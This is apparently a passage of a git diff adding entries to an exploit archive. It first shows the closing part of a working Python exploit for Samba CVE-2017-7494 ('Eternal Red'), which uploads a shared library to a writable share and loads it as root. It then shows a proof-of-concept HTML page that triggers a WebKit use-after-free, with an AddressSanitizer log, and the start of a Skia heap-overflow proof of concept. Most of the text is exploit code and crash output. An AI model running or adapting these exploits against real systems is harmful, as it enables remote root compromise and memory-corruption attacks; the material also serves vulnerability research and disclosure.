+            m = SMBMessage(ComOpenAndxRequest(filename = path,
+                                              access_mode = 0x0040,  # Sharing mode: Deny nothing to others
+                                              open_mode = 0x0001,    # Failed if file does not exist
+                                              search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,
+                                              timeout = timeout * 1000))
+            m.tid = tid
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)
+            messages_history.append(m)
+
+        def openCB(open_message, **kwargs):
+            messages_history.append(open_message)
+            if not open_message.status.hasError:
+                if max_length == 0:
+                    closeFid(open_message.tid, open_message.payload.fid)
+                    callback(( file_obj, open_message.payload.file_attributes, 0 ))
+                else:
+                    sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)
+            else:
+                errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))
+
+        def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):
+            read_count = self.max_raw_size - 2
+            m = SMBMessage(ComReadAndxRequest(fid = fid,
+                                              offset = offset,
+                                              max_return_bytes_count = read_count,
+                                              min_return_bytes_count = min(0xFFFF, read_count)))
+            m.tid = tid
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,
+                                                           read_len = read_len, remaining_len = remaining_len)
+
+        def readCB(read_message, **kwargs):
+            # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.
+            if not read_message.status.hasError:
+                read_len = kwargs['read_len']
+                remaining_len = kwargs['remaining_len']
+                data_len = read_message.payload.data_length
+                if max_length > 0:
+                    if data_len > remaining_len:
+                        file_obj.write(read_message.payload.data[:remaining_len])
+                        read_len += remaining_len
+                        remaining_len = 0
+                    else:
+                        file_obj.write(read_message.payload.data)
+                        remaining_len -= data_len
+                        read_len += data_len
+                else:
+                    file_obj.write(read_message.payload.data)
+                    read_len += data_len
+
+                if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):
+                    closeFid(read_message.tid, kwargs['fid'])
+                    callback(( file_obj, kwargs['file_attributes'], read_len ))  # Note that this is a tuple of 3-elements
+                else:
+                    sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)
+            else:
+                messages_history.append(read_message)
+                closeFid(read_message.tid, kwargs['fid'])
+                errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))
+
+        def closeFid(tid, fid):
+            m = SMBMessage(ComCloseRequest(fid))
+            m.tid = tid
+            self._sendSMBMessage(m)
+            messages_history.append(m)
+
+        if service_name not in self.connected_trees:
+            def connectCB(connect_message, **kwargs):
+                messages_history.append(connect_message)
+                if not connect_message.status.hasError:
+                    self.connected_trees[service_name] = connect_message.tid
+                    sendOpen(connect_message.tid)
+                else:
+                    errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))
+
+            m = SMBMessage(ComTreeConnectAndxRequest(r'\\%s\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))
+            self._sendSMBMessage(m)
+            self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)
+            messages_history.append(m)
+        else:
+            sendOpen(self.connected_trees[service_name])
+
+def get_connection(user, password, server, port, force_smb1=False):
+    if force_smb1:
+        smb_structs.SUPPORT_SMB2 = False
+
+    conn = SMBConnectionEx(user, password, "", "server")
+    assert conn.connect(server, port)
+    return conn
+
+def get_share_info(conn):
+    conn.hook_listShares()
+    return conn.listShares()
+
+def find_writeable_share(conn, shares):
+    print("[+] Searching for writable share")
+    filename = "red"
+    test_file = tempfile.TemporaryFile()
+    for share in shares:
+        try:
+            # If it's not writeable this will throw
+            conn.storeFile(share.name, filename, test_file)
+            conn.deleteFiles(share.name, filename)
+            print("[+] Found writeable share: " + share.name)
+            return share
+        except:
+            pass
+
+    return None
+
+def write_payload(conn, share, payload, payload_name):
+    with open(payload, "rb") as fin:
+        conn.storeFile(share.name, payload_name, fin)
+
+    return True
+
+def convert_share_path(share):
+    path = share.path[2:]
+    path = path.replace("\\", "/")
+    return path
+
+def load_payload(user, password, server, port, fullpath):
+    conn = get_connection(user, password, server, port, force_smb1 = True)
+    conn.hook_retrieveFile()
+
+    print("[+] Attempting to load payload")
+    temp_file = tempfile.TemporaryFile()
+
+    try:
+        conn.retrieveFile("IPC$", "\\\\PIPE\\" + fullpath, temp_file)
+    except:
+        pass
+
+    return
+
+def drop_payload(user, password, server, port, payload):
+    payload_name = "charizard"
+
+    conn = get_connection(user, password, server, port)
+    shares = get_share_info(conn)
+    share = find_writeable_share(conn, shares)
+
+    if share is None:
+        print("[!] No writeable shares on " + server + " for user: " + user)
+        sys.exit(-1)
+
+    if not write_payload(conn, share, payload, payload_name):
+        print("[!] Failed to write payload: " + str(payload) + " to server")
+        sys.exit(-1)
+
+    conn.close()
+
+    fullpath = convert_share_path(share)
+    return os.path.join(fullpath, payload_name)
+
+
+def main():
+    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
+    description= """Eternal Red Samba Exploit -- CVE-2017-7494
+        Causes vulnerable Samba server to load a shared library in root context
+        Credentials are not required if the server has a guest account
+        For remote exploit you must have write permissions to at least one share
+        Eternal Red will scan the Samba server for shares it can write to
+        It will also determine the fullpath of the remote share
+
+        For local exploit provide the full path to your shared library to load
+
+        Your shared library should look something like this
+
+        extern bool change_to_root_user(void);
+        int samba_init_module(void)
+        {
+            change_to_root_user();
+            /* Do what thou wilt */
+        }
+    """)
+    parser.add_argument("payload", help="path to shared library to load", type=str)
+    parser.add_argument("server", help="Server to target", type=str)
+    parser.add_argument("-p", "--port", help="Port to use defaults to 445", type=int)
+    parser.add_argument("-u", "--username", help="Username to connect as defaults to nobody", type=str)
+    parser.add_argument("--password", help="Password for user default is empty", type=str)
+    parser.add_argument("--local", help="Perform local attack. Payload should be fullpath!", type=bool)
+    args = parser.parse_args()
+
+    if not os.path.isfile(args.payload):
+        print("[!] Unable to open: " + args.payload)
+        sys.exit(-1)
+
+    port = 445
+    user = "nobody"
+    password = ""
+    fullpath = ""
+
+    if args.port:
+        port = args.port
+    if args.username:
+        user = args.username
+    if args.password:
+        password = args.password
+
+    if args.local:
+        fullpath = args.payload
+    else:
+        fullpath = drop_payload(user, password, args.server, port, args.payload)
+
+    load_payload(user, password, args.server, port, fullpath)
+
+if __name__ == "__main__":
+    main()
diff --git a/platforms/multiple/dos/42063.html b/platforms/multiple/dos/42063.html
new file mode 100755
index 000000000..5671dc4c0
--- /dev/null
+++ b/platforms/multiple/dos/42063.html
@@ -0,0 +1,158 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1109
+
+PoC:
+-->
+
+<body>
+<script>
+
+let f = document.body.appendChild(document.createElement('iframe'));
+let g = f.contentDocument.body.appendChild(document.createElement('iframe'));
+g.contentWindow.onunload = () => {
+    g.contentWindow.onunload = null;
+
+    let h = f.contentDocument.body.appendChild(document.createElement('iframe'));
+    h.contentWindow.onunload = () => {
+        h.contentWindow.onunload = null;
+
+        let a = f.contentDocument.createElement('a');
+        a.href = 'about:blank';
+        a.click();
+    };
+};
+
+f.src = 'about:blank';
+
+</script>
+</body>
+
+<!--
+Asan Log:
+=================================================================
+==4096==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c0e58 at pc 0x00010da7af9b bp 0x7fff5aaa92d0 sp 0x7fff5aaa92c8
+READ of size 8 at 0x61a0000c0e58 thread T0
+    #0 0x10da7af9a in WebCore::FrameView::scheduleRelayout() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa7f9a)
+    #1 0x10da6d069 in WebCore::FrameView::layout(bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa9a069)
+    #2 0x10da82ea1 in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaafea1)
+    #3 0x10da82edf in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaafedf)
+    #4 0x105629eea in WebKit::TiledCoreAnimationDrawingArea::flushLayers() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x4bfeea)
+    #5 0x10ec4844b in WebCore::LayerFlushScheduler::layerFlushCallback() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c7544b)
+    #6 0x7fffd624c396 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7396)
+    #7 0x7fffd624c306 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7306)
+    #8 0x7fffd622c995 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87995)
+    #9 0x7fffd57b8a5b in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30a5b)
+    #10 0x7fffd57b8890 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30890)
+    #11 0x7fffd57b86c5 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x306c5)
+    #12 0x7fffd3d5e5b3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x475b3)
+    #13 0x7fffd44d8d6a in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c1d6a)
+    #14 0x7fffd3d52f34 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3bf34)
+    #15 0x7fffd3d1d84f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x684f)
+    #16 0x7fffeb9e88c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
+    #17 0x7fffeb9e72e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
+    #18 0x105156b73 in main (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
+    #19 0x7fffeb784254 in start (/usr/lib/system/libdyld.dylib+0x5254)
+
+0x61a0000c0e58 is located 472 bytes inside of 1232-byte region [0x61a0000c0c80,0x61a0000c1150)
+freed by thread T0 here:
+    #0 0x108730cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
+    #1 0x10ad4a73f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fd73f)
+    #2 0x10f448eee in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2475eee)
+    #3 0x10f447ab9 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2474ab9)
+    #4 0x10da26c7e in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa53c7e)
+    #5 0x10578df3b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x623f3b)
+    #6 0x10da3d6ff in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6a6ff)
+    #7 0x10da3c7d3 in WebCore::FrameLoader::commitProvisionalLoad() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa697d3)
+    #8 0x10d737bd7 in WebCore::DocumentLoader::finishedLoading(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x764bd7)
+    #9 0x10d73fd0e in WebCore::DocumentLoader::maybeLoadEmpty() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x76cd0e)
+    #10 0x10d7400d5 in WebCore::DocumentLoader::startLoadingMainResource() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x76d0d5)
+    #11 0x10da40c31 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6dc31)
+    #12 0x10da3a673 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa67673)
+    #13 0x10efb4805 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe1805)
+    #14 0x10efb465f in WebCore::PolicyCallback::call(bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe165f)
+    #15 0x10efb5fba in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe2fba)
+    #16 0x1057781ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60e1ee)
+    #17 0x105778046 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60e046)
+    #18 0x1057880aa in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WebCore::FormState*, std::__1::function<void (WebCore::PolicyAction)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61e0aa)
+    #19 0x10efb5a59 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe2a59)
+    #20 0x10da3951f in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6651f)
+    #21 0x10da38236 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa65236)
+    #22 0x10da34b51 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa61b51)
+    #23 0x10da2e040 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5b040)
+    #24 0x10da2d5c9 in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5a5c9)
+    #25 0x10ee94e8c in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1ec1e8c)
+    #26 0x10ee9176f in WebCore::NavigationScheduler::timerFired() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1ebe76f)
+    #27 0x10fa4c971 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a79971)
+    #28 0x10ecaa46f in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1cd746f)
+    #29 0x7fffd6236243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)
+
+previously allocated by thread T0 here:
+    #0 0x108730790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
+    #1 0x7fffeb9062d9 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x22d9)
+    #2 0x10ad54154 in bmalloc::DebugHeap::malloc(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1907154)
+    #3 0x10ad494fb in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18fc4fb)
+    #4 0x10ace0e95 in bmalloc::Allocator::allocate(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893e95)
+    #5 0x10ace0178 in WTF::fastMalloc(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1893178)
+    #6 0x10da65109 in WebCore::FrameView::create(WebCore::Frame&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92109)
+    #7 0x10da26b5c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa53b5c)
+    #8 0x10578df3b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x623f3b)
+    #9 0x10da3d6ff in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6a6ff)
+    #10 0x10da3c7d3 in WebCore::FrameLoader::commitProvisionalLoad() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa697d3)
+    #11 0x10d737bd7 in WebCore::DocumentLoader::finishedLoading(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x764bd7)
+    #12 0x10d73fd0e in WebCore::DocumentLoader::maybeLoadEmpty() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x76cd0e)
+    #13 0x10d7400d5 in WebCore::DocumentLoader::startLoadingMainResource() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x76d0d5)
+    #14 0x10da40c31 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6dc31)
+    #15 0x10da3a673 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa67673)
+    #16 0x10efb4805 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe1805)
+    #17 0x10efb465f in WebCore::PolicyCallback::call(bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe165f)
+    #18 0x10efb5fba in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe2fba)
+    #19 0x1057781ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60e1ee)
+    #20 0x105778046 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60e046)
+    #21 0x1057880aa in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WebCore::FormState*, std::__1::function<void (WebCore::PolicyAction)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61e0aa)
+    #22 0x10efb5a59 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fe2a59)
+    #23 0x10da3951f in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6651f)
+    #24 0x10da38236 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa65236)
+    #25 0x10da34b51 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa61b51)
+    #26 0x10da2e040 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5b040)
+    #27 0x10da2d5c9 in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5a5c9)
+    #28 0x10da2d84a in WebCore::FrameLoader::urlSelected(WebCore::URL const&, WTF::String const&, WebCore::Event*, WebCore::LockHistory, WebCore::LockBackForwardList, WebCore::ShouldSendReferrer, WebCore::ShouldOpenExternalURLsPolicy, std::optional<WebCore::NewFrameOpenerPolicy>, WTF::AtomicString const&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5a84a)
+    #29 0x10db97108 in WebCore::HTMLAnchorElement::handleClick(WebCore::Event&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbc4108)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa7f9a) in WebCore::FrameView::scheduleRelayout()
+Shadow bytes around the buggy address:
+  0x1c3400018170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c3400018180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c3400018190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c34000181a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c34000181b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+=>0x1c34000181c0: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd
+  0x1c34000181d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c34000181e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c34000181f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3400018200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3400018210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==4096==ABORTING
+
+Tested on Safari 10.0.3(12602.4.8).
+-->
\ No newline at end of file
diff --git a/platforms/multiple/dos/42070.c b/platforms/multiple/dos/42070.c
new file mode 100755
index 000000000..b2894221a
--- /dev/null
+++ b/platforms/multiple/dos/42070.c
@@ -0,0 +1,133 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1155
+
+Skia bug: https://bugs.chromium.org/p/skia/issues/detail?id=6294
+
+There is a heap overflow in SkARGB32_Shader_Blitter::blitH caused by a rounding error in SkEdge::setLine. To trigger the bug Skia needs to be compiled with SK_RASTERIZE_EVEN_ROUNDING (true in, for example, Mozilla Firefox).
+
+To demonstrate the bug, compile (with SK_RASTERIZE_EVEN_ROUNDING defined) and run the following Proof of Concept:
+
+=================================================================
+*/
+
+#include "SkCanvas.h"
+#include "SkPath.h"
+#include "SkGradientShader.h"
+
+
+int main (int argc, char * const argv[]) {
+
+    SkBitmap bitmap;
+    bitmap.allocN32Pixels(1128, 500);
+
+    //Create Canvas
+    SkCanvas canvas(bitmap);
+
+    SkColor colors[2] = {SkColorSetARGB(10,0,0,0), SkColorSetARGB(10,255,255,255)};
+    SkPoint points[2] = {
+       SkPoint::Make(0.0f, 0.0f),
+       SkPoint::Make(256.0f, 256.0f)
+    };
+
+    SkPath path;
+    path.moveTo(1128, 0.5);
+    path.lineTo(-0.499, 100.5);
+    path.lineTo(1128, 200);
+    path.close();
+    SkPaint p;
+    p.setAntiAlias(false);
+    p.setShader(SkGradientShader::MakeLinear(
+                 points, colors, nullptr, 2,
+                 SkShader::kClamp_TileMode, 0, nullptr));
+
+    canvas.drawPath(path, p);
+
+    return 0;
+}
+
+/*
+=================================================================
+
+The PoC leads to a heap overflow in SkARGB32_Shader_Blitter::blitH (the shader and anti aliasing settings in the PoC are made specifically to select this Blitter)
+
+ASan log:
+
+=================================================================
+==46341==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001dea0 at pc 0x00000079d6d1 bp 0x7ffecd6a42c0 sp 0x7ffecd6a42b8
+WRITE of size 4 at 0x62100001dea0 thread T0
